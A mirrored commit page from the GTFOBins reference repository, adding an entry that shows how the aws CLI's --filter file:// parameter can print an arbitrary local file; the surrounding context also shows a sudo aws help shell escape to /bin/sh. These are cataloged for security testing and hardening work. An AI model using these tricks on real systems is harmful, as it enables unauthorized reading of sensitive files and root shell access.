mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Update aws.md
Add local file-read capabilite on aws binarie
This commit is contained in:
parent
4eca50ea16
commit
8d5fc0e3d2
@ -10,4 +10,8 @@ functions:
|
||||
code: |
|
||||
sudo aws help
|
||||
!/bin/sh
|
||||
file-read:The filter parameter is used to indicate a file with the filter in a specific format, when the file read does not follow the format the engine that parses the file prints its content on the terminal, this behavior affects most of the aws actions with filter parameter
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
aws ec2 describe-instances --filter file://$LFILE
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user